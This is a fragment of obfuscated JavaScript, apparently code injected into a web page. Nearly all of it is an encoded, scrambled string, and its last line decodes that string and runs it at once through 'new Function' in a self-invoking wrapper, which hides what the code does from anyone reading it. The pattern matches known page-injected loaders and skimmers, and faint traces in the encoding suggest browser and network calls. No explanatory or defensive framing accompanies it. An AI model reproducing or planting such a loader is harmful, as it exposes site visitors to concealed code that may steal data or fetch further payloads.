Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();